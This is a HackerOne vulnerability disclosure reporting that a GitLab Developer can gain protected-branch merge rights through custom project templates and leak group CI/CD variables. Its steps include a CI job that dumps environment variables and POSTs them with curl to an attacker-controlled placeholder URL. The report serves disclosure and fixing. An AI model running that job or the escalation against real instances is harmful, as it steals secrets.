Developer can leak group and any subgroup’s CI/CD variables using Custom project templates functionality
HackerOne report #2021616 by theluci
on 2023-06-12, assigned to @ottilia_westerlund:
Report | Attachments | How To Reproduce
Report
Hello,
Gitlab recently fixed several bugs that allowed a developer to import a project and leak group’s CI/CD variables. To protect against these types of attacks, Gitlab set the minimum role for importing projects to maintainer.
Gitlab also made the Custom project templates functionality reusable by developers in enterprise edition.
However, I found a bug using which a Developer can leak group or any subgroup’s CI/CD variables using Custom project templates functionality.
Background
Gitlab provides a Premium/Ultimate feature custom project templates functionality.
The owner of the top-level group can set a subgroup to be used as a source of custom templates for new projects in the group and in any of the subgroups.
Vulnerability
When issue #407374 (closed) was fixed gitlab changed importing logic as follows,
When a member imports a project where specific members are Allowed to merge/Allowed to push and merge -
Then Gitlab replaces user_id
of the member allowed to merge with the user_id
of the member importing the project.
That is, the member importing the project gets Allowed to merge/Allowed to push and merge access on the protected branch.
<------------------------------------------Important---------------------------------------------->
It was probably thought that only maintainers/owners can import a project, thus, them getting allowed to merge access will not be a bug.
However, Custom project template functionality internally imports the template project.
Thus, if any maintainer, owner, or any other member has allowed to merge permission on protected branch of any of the templates. Then, developer can just import the template (using custom project template functionality) and get allowed to merge setting on the protected branch.
<------------------------------------------------------------------------------------------------------>
Steps to reproduce
(Your instance must have an ultimate trial)
-
victim
creates a groupvictim-group
. -
victim
creates a subgroupsubgroup-to-be-template
and template projectstemplate1
,template2
inside. -
victim
goes tohttp://<Your_Instance_IP>/groups/<victim-group>/-/edit
, Expand Custom project templates and selectsubgroup-to-be-template
-
victim
goes to template1 repository settingshttp://<Your_Instance_IP>/<victim-group>/<subgroup-to-be-template>/template1/-/settings/repository
, Expand Protected branches and gives himself Allowed to merge OR Allowed to push and merge access on protected branch.
In a real-world scenario, it may not be the owner but any member (maybe a maintainer or some other member) that has Allowed to merge/Allowed to push and merge access on protected branch of any of the templates.
It might also be possible that no roles are Allowed to merge/Allowed to push and merge but specific users (any user).
As victim
,
5. victim
goes to http://<Your_Instance_IP>/groups/<victim-group>/-/settings/ci_cd
, **Expand Variables ** and adds some CI/CD variables.
6. victim
goes to http://<Your_Instance_IP>/groups/<victim-group>/-/group_members
and adds attacker
as Developer.
As attacker
,
7. attacker
goes to victim-group
, clicks on new project and chooses Create from template.
8. attacker
uses template1
and creates attacker-project
attacker
now have Allowed to merge/Allowed to push and merge access on protected branch of attacker-project
.
9. attacker
adds the following .gitlab-ci.yml file
job_name:
script:
- export > test.txt
- curl -X POST --data "$(cat test.txt)" attacker-controlled-url
The group's CI/CD variables are sent to attacker-controlled-url.
Output of checks
This bug happens on Self-hosted Gitlab Instance.
Results of GitLab environment info
System information
System: Ubuntu 20.04
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 3.0.6p216
Gem Version: 3.4.13
Bundler Version:2.4.13
Rake Version: 13.0.6
Redis Version: 6.2.11
Sidekiq Version:6.5.7
Go Version: unknown
GitLab information
Version: 16.0.4-ee
Revision: 7d6834bd32e
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.11
URL: http://x.x.x.x
HTTP Clone URL: http://x.x.x.x/some-group/some-project.git
SSH Clone URL: git@x.x.x.x:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.20.0
Repository storages:
- default: unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Impact
Developer of a group can leak group or any subgroup’s CI/CD variables.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: